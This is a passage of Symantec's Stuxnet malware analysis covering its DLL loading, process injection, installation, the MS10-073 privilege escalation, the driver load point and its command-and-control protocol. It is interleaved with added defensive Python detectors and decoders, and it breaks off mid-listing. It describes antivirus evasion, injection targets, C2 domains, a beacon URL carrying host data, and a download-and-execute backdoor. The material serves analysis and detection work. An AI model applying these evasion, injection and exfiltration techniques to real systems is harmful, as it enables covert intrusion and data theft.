Whenever Stuxnet needs to load a DLL, including itself, it uses a special method designed to bypass behavior-
blocking and host intrusion-protection based technologies that monitor LoadLibrary calls. Stuxnet calls
LoadLibrary with a specially crafted file name that does not exist on disk and normally causes LoadLibrary to fail.
However, W32.Stuxnet has hooked Ntdll.dll to monitor for requests to load specially crafted file names. These
specially crafted filenames are mapped to another location instead—a location specified by W32.Stuxnet. That
location is generally an area in memory where a .dll file has been decrypted and stored by the threat previously.
The filenames used have the pattern KERNEL32.DLL.ASLR.[HEXADECIMAL] or SHELL32.DLL.ASLR.[HEXADECIMAL],
where [HEXADECIMAL] is a hexadecimal value.

The functions hooked for this purpose in Ntdll.dll are:
• ZwMapViewOfSection
• ZwCreateSection
• ZwOpenFile
• ZwCloseFile
• ZwQueryAttributesFile
• ZwQuerySection
Once a .dll file has been loaded via the method shown above, GetProcAddress is used to find the address of a
specific export from the .dll file and that export is called, handing control to that new .dll file.
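The fake module names above are a usable detection signal: on a clean host a LoadLibrary call for a file that does not exist must fail, so a matching name that loads successfully implies the Ntdll hooks are in place. The following Python is an added, defender-side example (not code from the dossier or from Symantec) that applies that rule to API-trace lines. The trace-line layout, the `OK`/`FAIL` result tokens and the sample lines are constructed for the example and are not the output format of any real monitoring tool.

```python
import re
from typing import Dict, Iterable, List

# Fake module names the dossier describes: KERNEL32.DLL.ASLR.[HEX] or SHELL32.DLL.ASLR.[HEX]
FAKE_MODULE_RE = re.compile(r"^(?:KERNEL32|SHELL32)\.DLL\.ASLR\.[0-9A-Fa-f]+$", re.IGNORECASE)

# Constructed trace-line layout used for this example (assumption, not a real tool's format):
#   <pid> <api>("<module name>") -> <OK|FAIL>
TRACE_RE = re.compile(
    r'^(?P<pid>\d+)\s+(?P<api>LoadLibrary(?:Ex)?[AW]|LdrLoadDll)\("(?P<name>[^"]*)"\)\s*->\s*(?P<result>OK|FAIL)$'
)


def is_fake_aslr_module(name: str) -> bool:
    """True for the non-existent module names that Stuxnet's Ntdll hooks redirect."""
    return bool(FAKE_MODULE_RE.match(name.strip()))


def scan_module_load_trace(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Flag loads of fake ASLR-named modules.

    A name of this shape cannot be resolved from disk, so a call that still
    returns OK means something in the process is intercepting the Zw* file and
    section calls listed above; a failing call is only a weaker, medium signal.
    """
    alerts: List[Dict[str, str]] = []
    for line in lines:
        m = TRACE_RE.match(line.strip())
        if not m or not is_fake_aslr_module(m.group("name")):
            continue
        alerts.append({
            "pid": m.group("pid"),
            "api": m.group("api"),
            "module": m.group("name"),
            "severity": "high" if m.group("result") == "OK" else "medium",
        })
    return alerts


# Constructed sample trace: two legitimate loads and two fake-name loads.
CONSTRUCTED_TRACE = [
    '1044 LoadLibraryW("C:\\Windows\\System32\\kernel32.dll") -> OK',
    '1044 LoadLibraryW("KERNEL32.DLL.ASLR.0123ABCD") -> OK',
    '2210 LoadLibraryA("SHELL32.DLL.ASLR.deadbeef") -> FAIL',
    '2210 LdrLoadDll("C:\\Windows\\System32\\shell32.dll") -> OK',
]

if __name__ == "__main__":
    for alert in scan_module_load_trace(CONSTRUCTED_TRACE):
        print(alert)
```

The hexadecimal suffix is deliberately not pinned to a fixed length, because the dossier only says it is "a hexadecimal value"; a real deployment would also want the process image name alongside the pid so that a hit in a trusted process such as lsass.exe stands out.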

Injection Technique
Whenever an export is called, Stuxnet typically injects the entire DLL into another process and then just calls the
particular export. Stuxnet can inject into an existing or newly created arbitrary process or a preselected trusted
process. When injecting into a trusted process, Stuxnet may keep the injected code in the trusted process or
instruct the trusted process to inject the code into another currently running process.

The trusted process consists of a set of default Windows processes and a variety of security products. The
currently running processes are enumerated for the following:
• Kaspersky KAV (avp.exe)
• Mcafee (Mcshield.exe)
• AntiVir (avguard.exe)
• BitDefender (bdagent.exe)
• Etrust (UmxCfg.exe)
• F-Secure (fsdfwd.exe)
• Symantec (rtvscan.exe)
• Symantec Common Client (ccSvcHst.exe)
• Eset NOD32 (ekrn.exe)
• Trend Pc-Cillin (tmpproxy.exe)
In addition, the registry is searched for indicators that the following programs are installed:
• KAV v6 to v9
• McAfee
• Trend PcCillin
If one of the above security product processes is detected, version information of the main image is extracted.
Based on the version number, the target process of injection will be determined or the injection process will fail
if the threat considers the security product non-bypassable.

The potential target processes for the injection are as follows:
• Lsass.exe
• Winlogon.exe
• Svchost.exe
• The installed security product process
Table 5 describes which process is used for injection depending on which security products are installed. In
addition, Stuxnet will determine if it needs to use one of the two currently undisclosed privilege escalation
vulnerabilities before injecting. Then, Stuxnet executes the target process in suspended mode.

Table 5
Process Injection

Security Product Installed  Injection target
KAV v1 to v7                LSASS.EXE
KAV v8 to v9                KAV Process
McAfee                      Winlogon.exe
AntiVir                     Lsass.exe
BitDefender                 Lsass.exe
ETrust v5 to v6             Fails to Inject
ETrust (Other)              Lsass.exe
F-Secure                    Lsass.exe
Symantec                    Lsass.exe
ESET NOD32                  Lsass.exe
Trend PC Cillin             Trend Process

A template PE file is extracted from itself and a new section called .verif is created. The section is made large
enough so that the entry point address of the target process falls within the .verif section. At that address in
the template PE file, Stuxnet places a jump to the actual desired entry point of the injected code. These bytes are
then written to the target process and ResumeThread is called allowing the process to execute and call the
injected code. This technique may bypass security products that employ behavior-blocking.

In addition to creating the new section and patching the entry point, the .stub section of the wrapper .dll file
(that contains the main .dll file and configuration data) is mapped to the memory of the new process by means of
shared sections. So the new process has access to the original .stub section. When the newly injected process is
resumed, the injected code unpacks the .dll file from the mapped .stub section and calls the desired export.

Instead of executing the export directly, the injected code can also be instructed to inject into another arbitrary
process instead and within that secondary process execute the desired export.
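The injection sequence described in this section (create the target suspended, write into it, patch its entry point, ResumeThread) is stateful, so a detector has to correlate several events per child process rather than match a single line. The following Python is an added, defender-side example (not code from the dossier or from Symantec) that does that correlation over API-trace lines and alerts only when a suspended-created target named in Table 5 is written to before being resumed; a suspended create with no memory write, which is what a debugger produces, does not alert. The trace-line layout, the field names and the sample lines are constructed for the example and are not any real tool's format; the security product's own process (for example the KAV process from Table 5) is supplied per host through `extra_targets`.

```python
import re
from typing import Dict, Iterable, List, Optional, Set

# Injection targets named in the dossier; the installed security product's process is added per host.
DEFAULT_TARGETS = {"lsass.exe", "winlogon.exe", "svchost.exe"}

# Constructed trace-line layout for this example (assumption, not any real tool's format):
#   <parent_pid> <api> child=<child_pid> [key=value ...]
LINE_RE = re.compile(r"^(?P<parent>\d+)\s+(?P<api>\w+)\s+child=(?P<child>\d+)(?P<rest>.*)$")
KV_RE = re.compile(r"(\w+)=(\S+)")


def detect_suspended_injection(lines: Iterable[str],
                               extra_targets: Optional[Set[str]] = None) -> List[Dict[str, str]]:
    """Alert when a target process is created suspended, written to by its parent, then resumed."""
    targets = DEFAULT_TARGETS | {t.lower() for t in (extra_targets or set())}
    pending: Dict[str, Dict[str, object]] = {}   # child pid -> state since its CreateProcess
    alerts: List[Dict[str, str]] = []
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        api, child = m.group("api"), m.group("child")
        fields = dict(KV_RE.findall(m.group("rest")))
        if api == "CreateProcessW":
            image = fields.get("image", "").rsplit("\\", 1)[-1].lower()
            pending[child] = {
                "parent": m.group("parent"),
                "image": image,
                "suspended": "CREATE_SUSPENDED" in fields.get("flags", ""),
                "written": 0,
            }
        elif api == "WriteProcessMemory" and child in pending:
            pending[child]["written"] = int(pending[child]["written"]) + int(fields.get("bytes", "0"))
        elif api == "ResumeThread" and child in pending:
            state = pending.pop(child)
            if state["suspended"] and int(state["written"]) > 0 and state["image"] in targets:
                alerts.append({
                    "parent": str(state["parent"]),
                    "child": child,
                    "image": str(state["image"]),
                    "bytes_written": str(state["written"]),
                })
    return alerts


# Constructed sample trace (not real telemetry).
CONSTRUCTED_TRACE = [
    "1500 CreateProcessW child=1620 image=C:\\Windows\\System32\\lsass.exe flags=CREATE_SUSPENDED",
    "1500 WriteProcessMemory child=1620 bytes=24576",
    "1500 ResumeThread child=1620",
    # hypothetical security-product process: only flagged when passed via extra_targets
    "1500 CreateProcessW child=1640 image=C:\\KAV\\avp.exe flags=CREATE_SUSPENDED",
    "1500 WriteProcessMemory child=1640 bytes=24576",
    "1500 ResumeThread child=1640",
    # not created suspended: ordinary process start
    "3000 CreateProcessW child=3100 image=C:\\Windows\\System32\\notepad.exe flags=0",
    "3000 ResumeThread child=3100",
    # suspended but never written to: debugger-style, no alert
    "3200 CreateProcessW child=3300 image=C:\\Windows\\System32\\svchost.exe flags=CREATE_SUSPENDED",
    "3200 ResumeThread child=3300",
]

if __name__ == "__main__":
    for alert in detect_suspended_injection(CONSTRUCTED_TRACE, {"avp.exe"}):
        print(alert)
```

Keying the state on the child pid rather than on the parent is what lets the rule survive the second-hop variant the text mentions (a trusted process instructed to inject into yet another process): each hop is its own create/write/resume triple and is evaluated on its own.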

Configuration Data Block

The configuration data block contains all the values used to control how Stuxnet will act on a compromised
computer. Example fields in the configuration data can be seen in the Appendix.

When a new version of Stuxnet is created (using the main DLL plus the 90h-byte data block plus the
configuration data), the configuration data is updated, and also a computer description block is appended to the
block (encoded with a NOT XOR 0xFF). The computer description block contains information such as computer
name, domain name, OS version, and infected S7P paths. Thus, the configuration data block can grow pretty big,
larger than the initial 744 bytes.

The following is an example of the computer description block:

5.1 - 1/1/0 - 2 - 2010/09/22-15:15:47 127.0.0.1, [COMPUTER NAME] [DOMAIN NAME] [c:\a\1.zip:\proj.s7p]

The following describes each field:

5.1 – Major OS Version and Minor OS Version
1/1/0 – Flags used by Stuxnet
2 – Flag specifying if the computer is part of a workgroup or domain
2010/09/22-15:15:47 – The time of infection.
127.0.0.1 – Up to IP addresses of the compromised computer (not in the June 2009 version).
[COMPUTER NAME] – The computer name.
[DOMAIN NAME] – The domain or workgroup name.
[c:\a\1.zip:\proj.s7p] – The file name of the infected project file.
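When a configuration block is recovered from an infected host, the appended description blocks are the quickest way to reconstruct which machines the sample passed through. The following Python is an added example (not code from the dossier or from Symantec) that undoes the NOT encoding and parses the block into its fields. It assumes the fields are delimited exactly as in the dossier's example line above and that the last three fields are enclosed in square brackets; the sample block is constructed for the example.

```python
import re
from typing import Any, Dict, List

# Layout of the description block as illustrated in the dossier (delimiters are an assumption):
#   <major>.<minor> - <f/f/f> - <membership flag> - <yyyy/mm/dd-hh:mm:ss> <ip>[, <ip>...], [NAME] [DOMAIN] [PROJECT]
BLOCK_RE = re.compile(
    r"^(?P<major>\d+)\.(?P<minor>\d+) - (?P<flags>\d+/\d+/\d+) - (?P<membership>\d) - "
    r"(?P<timestamp>\d{4}/\d{2}/\d{2}-\d{2}:\d{2}:\d{2}) (?P<ips>[0-9., ]*?),? (?P<rest>\[.*)$"
)


def decode_not(blob: bytes) -> str:
    """Undo the NOT (XOR 0xFF) encoding applied to the appended description block."""
    return bytes(b ^ 0xFF for b in blob).decode("ascii", "replace")


def parse_description_block(text: str) -> Dict[str, Any]:
    """Split a decoded description block into named fields."""
    m = BLOCK_RE.match(text.strip())
    if not m:
        raise ValueError("not a recognised computer description block")
    bracketed: List[str] = re.findall(r"\[([^\]]*)\]", m.group("rest"))
    if len(bracketed) != 3:
        raise ValueError("expected [computer name] [domain name] [project file] fields")
    ips = [ip for ip in re.split(r",\s*", m.group("ips")) if ip]
    return {
        "os_version": f"{m.group('major')}.{m.group('minor')}",
        "flags": m.group("flags"),
        "domain_membership_flag": m.group("membership"),
        "infected_at": m.group("timestamp"),
        "ip_addresses": ips,
        "computer_name": bracketed[0],
        "domain_name": bracketed[1],
        "infected_project": bracketed[2],
    }


def parse_encoded_block(blob: bytes) -> Dict[str, Any]:
    """Decode and parse a NOT-encoded description block in one step."""
    return parse_description_block(decode_not(blob))


# Constructed sample (host names are made up); the encoded form is what would sit in the config block.
CONSTRUCTED_BLOCK = "5.1 - 1/1/0 - 2 - 2010/09/22-15:15:47 127.0.0.1, [WS-ENG01] [PLANT] [c:\\a\\1.zip:\\proj.s7p]"
CONSTRUCTED_ENCODED = bytes(b ^ 0xFF for b in CONSTRUCTED_BLOCK.encode("ascii"))

if __name__ == "__main__":
    print(parse_encoded_block(CONSTRUCTED_ENCODED))
```

Because the 0xFF NOT encoding turns printable ASCII into high-bit bytes, a quick way to locate appended blocks in a dumped configuration is to look for runs of bytes in the 0x80-0xFF range that decode to the `<major>.<minor> - ` prefix.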

Installation
Export 15 is the first export called when the .dll file is loaded for the first time. It is responsible for checking that
the threat is running on a compatible version of Windows, checking whether the computer is already infected or
not, elevating the privilege of the current process to system, checking what antivirus products are installed, and
what the best process to inject into is. It then injects the .dll file into the chosen process using a unique injection
technique described in the Injection Technique section and calls export 16.
Figure 10

Control flow for export 15

The first task in export 15 is to check if the configuration data is up-to-date. The configuration data can be
stored in two locations. Stuxnet checks which is most up-to-date and proceeds with that configuration data.
Next, Stuxnet determines if it is running on a 64-bit machine or not; if the machine is 64-bit the threat exits.
At this point it also checks to see what operating system it is running on. Stuxnet will only run on the following
operating systems:
• Win2K
• WinXP
• Windows 2003
• Vista
• Windows Server 2008
• Windows 7
• Windows Server 2008 R2
If it is not running on one of these operating systems it will exit.

Next, Stuxnet checks if it has Administrator rights on the computer. Stuxnet wants to run with the highest
privilege possible so that it will have permission to take whatever actions it likes on the computer. If it does not
have Administrator rights, it will execute one of the two zero-day escalation of privilege attacks described below.

If the process already has the rights it requires it proceeds to prepare to call export 16 in the main .dll file. It calls
export 16 by using the injection techniques described in the Injection Technique section.

When the process does not have Administrator rights on the system it will try to attain these privileges by using
one of two zero-day escalation of privilege attacks. The attack vector used is based on the operating system
of the compromised computer. If the operating system is Windows Vista, Windows 7, or Windows Server 2008
R2 the currently undisclosed Task Scheduler Escalation of Privilege vulnerability is exploited. If the operating
system is Windows XP or Windows 2000 the Windows Win32k.sys Local Privilege Escalation vulnerability
(MS10-073) is exploited.

If exploited, both of these vulnerabilities result in the main .dll file running as a new process, either within the
csrss.exe process in the case of the win32k.sys vulnerability or as a new task with Administrator rights in the
case of the Task Scheduler vulnerability.

The code to exploit the win32k.sys vulnerability is stored in resource 250. Details of the Task Scheduler
vulnerability currently are not released as patches are not yet available. The Win32k.sys vulnerability is described
in the Windows Win32k.sys Local Privilege Escalation vulnerability (MS10-073) section.

After export 15 completes the required checks, export 16 is called.

Export 16 is the main installer for Stuxnet. It checks the date and the version number of the compromised
computer; decrypts, creates and installs the rootkit files and registry keys; injects itself into the services.exe
process to infect removable drives; injects itself into the Step7 process to infect all Step 7 projects; sets up the
global mutexes that are used to communicate between different components; and connects to the RPC server.
Figure 11

Infection routine flow

Export 16 first checks that the configuration data is valid, after that it checks the value “NTVDM TRACE” in the
following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MS-DOS Emulation

If this value is equal to 19790509 the threat will exit. This is thought to be an infection marker or a “do not
infect” marker. If this is set correctly infection will not occur. The value may be a random string and represent
nothing, but also appears to match the format of date markers used in the threat. As a date, the value may be
May 9, 1979. This date could be an arbitrary date, a birth date, or some other significant date. While on May 9,
1979 a variety of historical events occurred, according to Wikipedia “Habib Elghanian was executed by a firing
squad in Tehran sending shock waves through the closely knit Iranian Jewish community. He was the first Jew
and one of the first civilians to be executed by the new Islamic government. This prompted the mass exodus of
the once 100,000 member strong Jewish community of Iran which continues to this day.” Symantec cautions
readers on drawing any attribution conclusions. Attackers would have the natural desire to implicate another
party.

Next, Stuxnet reads a date from the configuration data (offset 0x8c in the configuration data). If the current date
is later than the date in the configuration file then infection will also not occur and the threat will exit. The date
found in the current configuration file is June 24, 2012.

Stuxnet communicates between different components via global mutexes. Stuxnet tries to create such a global
mutex but first it will use SetSecurityDescriptorDacl for computers running Windows XP and also the
SetSecurityDescriptorSacl API for computers running Windows Vista or later to reduce the integrity levels of
objects, and thus ensure no write actions are denied.

Next, Stuxnet creates 3 encrypted files. These files are read from the .stub section of Stuxnet, encrypted, and
written to disk. The files are:
1. The main Stuxnet payload .dll file is saved as Oem7a.pnf
2. A 90 byte data file copied to %SystemDrive%\inf\mdmeric3.PNF
3. The configuration data for Stuxnet is copied to %SystemDrive%\inf\mdmcpq3.PNF
4. A log file is copied to %SystemDrive%\inf\oem6C.PNF
Then Stuxnet checks the date again to ensure the current date is before June 24, 2012.

Subsequently Stuxnet checks whether it is the latest version or if the version encrypted on disk is newer. It does
this by reading the encrypted version from the disk, decrypting it, and loading it into memory. Once loaded
Stuxnet calls export 6 from the newly loaded file; export 6 returns the version number of the newly loaded file
from the configuration data. In this way Stuxnet can read the version number from its own configuration data and
compare it with the version number from the file on disk. If the versions match then Stuxnet continues.

Provided that the version check passed, Stuxnet will extract, decode, and write two files from the resources
section to disk. The files are read from resource 201 and 242 and are written to disk as “Mrxnet.sys” and
“Mrxcls.sys” respectively. These are two driver files; one serves as the load point and the other is used to hide
malicious files on the compromised computer and to replace the Stuxnet files on the disk if they are removed. The
mechanics of these two files are discussed in the Load Point and Rootkit Functionality sections respectively. When
these files are created the file time on them is changed to match the times of other files in the system directory
to avoid suspicion. Once these files have been dropped Stuxnet creates the registry entries necessary to load these
files as services that will automatically run when Windows starts.

Once Stuxnet has established that the rootkit was installed correctly it creates some more global mutexes to
signal that installation has occurred successfully.

Stuxnet passes control to two other exports to continue the installation and infection routines. Firstly, it injects
the payload .dll file into the services.exe process and calls export 32, which is responsible for infecting newly
connected removable drives and for starting the RPC server. Secondly, Stuxnet injects the payload .dll file into
the Step7 process S7tgtopx.exe and calls export 2. In order to succeed in this action, Stuxnet may need to kill the
explorer.exe and S7tgtopx.exe processes if they are running. Export 2 is used to infect all Step7 project files as
outlined in the Step7 Project File Infection section.

From here execution of Stuxnet continues via these 2 injections and via the driver files and services that were
created.

Stuxnet then waits for a short while before trying to connect to the RPC server that was started by the export
32 code. It will call function 0 to check it can successfully connect and then it makes a request to function 9 to
receive some information, storing this data in a log file called oem6c.pnf.

At this time, all the default spreading and payload routines have been activated.

Windows Win32k.sys Local Privilege Escalation (MS10-073)

Stuxnet exploited a 0-day vulnerability in win32k.sys, used for local privilege escalation. The vulnerability was
patched on October 12, 2010. The vulnerability resides in code that calls a function in a function pointer table;
however, the index into the table is not validated properly allowing code to be called outside of the function
table.

The installation routine in Export 15, extracts and executes Resource 250, which contains a DLL that invokes the
local privilege escalation exploit. The DLL contains a single export—Tml_1. The code first verifies that the
execution environment isn’t a 64-bit system and is Windows XP or Windows 2000.

If the snsm7551.tmp file exists execution ceases, otherwise the file ~DF540C.tmp is created, which provides an
in-work marker.

Next, win32k.sys is loaded into memory and the vulnerable function table pointer is found. Next, Stuxnet will
examine the DWORDs that come after the function table to find a suitable DWORD to overload as a virtual address
that will be called. When passing in an overly large index into the function table, execution will transfer to code
residing at one of the DWORDs after the function table. These DWORDs are just data used elsewhere in
win32k.sys, but hijacked by Stuxnet. For example, if the ASCII string ‘aaaa’ (DWORD 0x60606060) is located after
the function table, Stuxnet will allocate shellcode at address 0x60606060 and then pass in an overly large
function table index that points to the DWORD ‘aaaa’ (0x60606060).

Because the available space at the address (in the above example 0x60606060) may be limited, Stuxnet uses
a two stage shellcode strategy. Memory is allocated for the main shellcode and at the chosen hijacked address,
Stuxnet only places a small piece of shellcode that will jump to the main shellcode.

Next, Stuxnet drops a malformed keyboard layout file into the Temp directory with the file name
~DF<random>.tmp. The malformed keyboard layout file contains a byte that will result in the overly large index
into the function table. NtUserLoadKeyboardLayoutEx is called to load the malformed keyboard layout file
successfully invoking the exploit. The original keyboard layout is restored and then the malformed keyboard
layout file is deleted.

The shellcode then loads the main Stuxnet DLL in the context of CSRSS.EXE.

Load Point
Stuxnet drops Resource 242 MrxCls.sys via Export 16. MrxCls is a driver digitally signed with a compromised
Realtek certificate that was revoked on July 16, 2010 by Verisign. A different version of the driver was also found
signed by a different compromised digital certificate from JMicron.

Mrxcls.sys is a driver that allows Stuxnet to be executed every time an infected system boots and thus acts as
the main load-point for the threat. The driver is registered as a boot start service creating the registry key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxCls\”ImagePath” = “%System%\drivers\mrxcls.sys”
and thus loading early in the Windows boot process.

The goal of the driver is to inject and execute copies of Stuxnet into specific processes.

The driver contains an encrypted data block. After decryption, this block contains (among others) a registry
key/value pair, which is normally HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MrxCls\“Data”.

The driver reads this binary value (previously set by Stuxnet during the installation process). The value is
decrypted. It contains a list of pairs (target process name, module to inject):
• services.exe — %Windir%\inf\oem7A.PNF
• S7tgtopx.exe — %Windir%\inf\oem7A.PNF
• CCProjectMgr.exe — %Windir%\inf\oem7A.PNF
• explorer.exe — %Windir%\inf\oem7m.PNF
The services.exe, s7tgtopx.exe (Simatic manager) and CCProjectMgr.exe (WinCC project manager) will be
injected with oem7a.pnf, which is a copy of the main Stuxnet dll. Once injected, Stuxnet executes on the
compromised computer.

Explorer.exe is injected with oem7m.pnf, an unknown file, which does not appear to be dropped by Stuxnet.
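The Installation and Load Point sections between them name a compact set of host artefacts: the NTVDM TRACE marker value, the .PNF files in the inf directory, the MRxCls and MRxNet driver services with their ImagePath values, the encrypted MrxCls "Data" value, and the two MS10-073 marker files. The following Python is an added, defender-side example (not code from the dossier or from Symantec) that checks a host inventory for all of them at once. The inventory layout (a dict of registry values, service image paths and file paths) and the sample inventory are constructed for the example; on a real host the dict would be filled from a registry and file-system collection, and matching is on lower-cased names and basenames because the dossier itself mixes cases and %Windir%/%SystemDrive% prefixes.

```python
from typing import Any, Dict, List

# Indicators as named in the dossier (matched case-insensitively).
DO_NOT_INFECT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MS-DOS Emulation"
DO_NOT_INFECT_VALUE = "NTVDM TRACE"
DO_NOT_INFECT_DATA = 19790509
DROPPED_PNF = {"oem7a.pnf", "mdmeric3.pnf", "mdmcpq3.pnf", "oem6c.pnf"}
DRIVER_SERVICES = {"mrxcls": "mrxcls.sys", "mrxnet": "mrxnet.sys"}
MRXCLS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MrxCls"
EXPLOIT_MARKERS = {"snsm7551.tmp", "~df540c.tmp"}   # marker files of the MS10-073 exploit routine


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess_host(inventory: Dict[str, Any]) -> List[str]:
    """Return one finding string per Stuxnet installation artefact present in the inventory."""
    findings: List[str] = []
    registry = {key.lower(): {name.lower(): data for name, data in values.items()}
                for key, values in inventory.get("registry", {}).items()}

    marker = registry.get(DO_NOT_INFECT_KEY.lower(), {}).get(DO_NOT_INFECT_VALUE.lower())
    if marker == DO_NOT_INFECT_DATA:
        findings.append("registry: NTVDM TRACE = 19790509 (the 'do not infect' marker is set)")

    basenames = {_basename(p) for p in inventory.get("files", [])}
    for name in sorted(DROPPED_PNF & basenames):
        findings.append(f"file: dropped Stuxnet .PNF present: {name}")
    for name in sorted(EXPLOIT_MARKERS & basenames):
        findings.append(f"file: MS10-073 exploit marker present: {name}")

    services = {name.lower(): image for name, image in inventory.get("services", {}).items()}
    for service, driver in DRIVER_SERVICES.items():
        image = services.get(service)
        if image is not None and _basename(image) == driver:
            findings.append(f"service: {service} registered with ImagePath {image}")

    if "data" in registry.get(MRXCLS_KEY.lower(), {}):
        findings.append("registry: MrxCls 'Data' injection list present")
    return findings


# Constructed inventory of an infected host (not collected from a real machine).
CONSTRUCTED_INVENTORY = {
    "registry": {
        DO_NOT_INFECT_KEY: {"NTVDM TRACE": 19790509},
        MRXCLS_KEY: {"ImagePath": r"%System%\drivers\mrxcls.sys", "Data": b"\x01\x02\x03"},
    },
    "services": {
        "MRxCls": r"%System%\drivers\mrxcls.sys",
        "MRxNet": r"%System%\drivers\mrxnet.sys",
        "Spooler": r"%System%\spoolsv.exe",
    },
    "files": [
        r"C:\Windows\inf\oem7A.PNF",
        r"C:\Windows\inf\mdmcpq3.PNF",
        r"C:\Windows\inf\usbport.PNF",   # a legitimate .PNF, must not be flagged
    ],
}

if __name__ == "__main__":
    for finding in assess_host(CONSTRUCTED_INVENTORY):
        print(finding)
```

The service check compares the ImagePath basename rather than the full path because the dossier gives the path with the %System% environment prefix, and a collection tool may have expanded it; a service registered under the MRxCls name but pointing elsewhere is worth a separate look but is not this indicator.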

Command and Control

After the threat has installed itself, dropped its files, and gathered some information about the system it
contacts the command and control server on port 80 and sends some basic information about the compromised
computer to the attacker via HTTP. Two command and control servers have been used in known samples:
• www[.]mypremierfutbol[.]com
• www[.]todaysfutbol[.]com
The two URLs above previously pointed to servers in Malaysia and Denmark; however they have since been
redirected to prevent the attackers from controlling any compromised computers. The threat has the capability
to update itself with new command and control domains, but we have not seen any files with updated
configurations as yet. A configuration file named %Windir%\inf\mdmcpq3.PNF is read and the updated
configuration information from that file is written to the main dll and the checksum of the dll is recalculated to
ensure it is still correct.

System data is gathered by export 28 and consists of the following information in the following format:

Part 1:

0x00 byte 1, fixed value
0x01 byte from Configuration Data (at offset 14h)
0x02 byte OS major version
0x03 byte OS minor version
0x04 byte OS service pack major version
0x05 byte size of part 1 of payload
0x06 byte unused, 0
0x07 byte unused, 0
0x08 dword from C. Data (at offset 10h, Sequence ID)
0x0C word unknown
0x0E word OS suite mask
0x10 byte unused, 0
0x11 byte flags
0x12 string computer name, null-terminated
0xXX string domain name, null-terminated

Part 2, following part 1:

0x00 dword IP address of interface 1, if any
0x04 dword IP address of interface 2, if any
0x08 dword IP address of interface 3, if any
0x0C dword from Configuration Data (at offset 9Ch)
0x10 byte unused, 0
0x11 string copy of S7P string from C. Data (418h)

Note that the payload contains the machine and domain name, as well as OS information. The flags at offset 11h
have the 4th bit set if at least one of the two registry values is found:
• HKEY_LOCAL_MACHINE\Software\Siemens\Step7, value: STEP7_Version
• HKEY_LOCAL_MACHINE\Software\Siemens\WinCC\Setup, value: Version
This informs the attackers if the machine is running the targeted ICS programming software Siemens Step7 or
WinCC.

The payload data is then XOR-ed with the byte value 0xFF.

After the data is gathered, export #29 will then be executed (using the previously mentioned injection technique)
to send the payload to a target server. The target process can be an existing Internet Explorer process
(iexplore.exe), by default or if no iexplore.exe process is found the target browser process will be determined by
examining
the registry key HKEY_CLASSES_ROOT\HTTP\SHELL\OPEN\COMMAND. A browser process is then created and
injected to run Export #29.

Export #29 is used to send the above information to one of the malicious Stuxnet servers specified in the
Configuration Data block. First, one of the two below legitimate web servers referenced in the Configuration Data
block are queried, to test network connectivity:
• www.windowsupdate.com
• www.msn.com
If the test passes, the network packet is built. It has the following format:

0x00 dword 1, fixed value
0x04 clsid unknown
0x14 byte[6] unknown
0x1A dword IP address of main interface
0x1E byte[size] payload

The payload is then XOR-ed with a static 31-byte long byte string found inside Stuxnet:

0x67, 0xA9, 0x6E, 0x28, 0x90, 0x0D, 0x58, 0xD6, 0xA4, 0x5D, 0xE2, 0x72, 0x66, 0xC0, 0x4A, 0x57, 0x88, 0x5A,
0xB0, 0x5C, 0x6E, 0x45, 0x56, 0x1A, 0xBD, 0x7C, 0x71, 0x5E, 0x42, 0xE4, 0xC1

The result is “hexified” (in order to transform binary data to an ASCII string). For instance, the sequence of
bytes (0x12, 0x34) becomes the string “1234”.

The payload is then sent to one of the two aforementioned URLs, as the “data” parameter. For example:

[http://]www.mypremierfutbol.com/index.php?data=1234...

Using the HTTP protocol as well as pure ASCII parameters is a common way by malware (and legitimate
applications for that matter) to bypass corporate firewall blocking rules.

The malicious Stuxnet server processes the query and may send a response to the client. The response payload
is located in the HTTP Content section. Contrary to the payload sent by the client, it is pure binary data.
However, it is encrypted with the following static 31-byte long XOR key:

0xF1, 0x17, 0xFA, 0x1C, 0xE2, 0x33, 0xC1, 0xD7, 0xBB, 0x77, 0x26, 0xC0, 0xE4, 0x96, 0x15, 0xC4, 0x62, 0x2E,
0x2D, 0x18, 0x95, 0xF0, 0xD8, 0xAD, 0x4B, 0x23, 0xBA, 0xDC, 0x4F, 0xD7, 0x0C

The decrypted server response has the following format:

0x00 dword payload module size (n)
0x04 byte command byte, can be 0 or 1
0x05 byte[n] payload module (Windows executable)

Depending on the command byte, the payload module is either loaded in the current process, or in a separate
process via RPC. Then, the payload module’s export #1 is executed.

This feature gave Stuxnet backdoor functionality, as it had the possibility (before the *futbol* domains were
blocked) to upload and run any code on an infected machine. At the time of writing no additional executables
were detected as being sent by the attackers, but this method likely allowed them to download and execute
additional tools or deliver updated versions of Stuxnet.
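The two layouts, the two XOR keys and the hex encoding above are everything needed to decode a captured beacon (the `data=` query parameter) and a captured server reply from proxy or packet-capture logs. The following Python is an added example (not code from the dossier or from Symantec) that does that decoding and returns the host details the beacon carries. It makes these assumptions where the text is silent: both 31-byte keys repeat cyclically over longer data; the request key covers the whole packet (header and payload) while the 0xFF XOR covers only the part 1/part 2 system data; multi-byte fields are little-endian; IP addresses are stored in network byte order; the "4th bit" of the flags byte is mask 0x08; and the S7P string is NUL-terminated. The sample beacon is constructed inside the block, not captured traffic.

```python
import socket
import struct
from typing import Any, Dict, Tuple

# Both 31-byte XOR keys are the ones quoted in the dossier.
REQUEST_KEY = bytes([
    0x67, 0xA9, 0x6E, 0x28, 0x90, 0x0D, 0x58, 0xD6, 0xA4, 0x5D, 0xE2, 0x72, 0x66, 0xC0, 0x4A, 0x57,
    0x88, 0x5A, 0xB0, 0x5C, 0x6E, 0x45, 0x56, 0x1A, 0xBD, 0x7C, 0x71, 0x5E, 0x42, 0xE4, 0xC1])
RESPONSE_KEY = bytes([
    0xF1, 0x17, 0xFA, 0x1C, 0xE2, 0x33, 0xC1, 0xD7, 0xBB, 0x77, 0x26, 0xC0, 0xE4, 0x96, 0x15, 0xC4,
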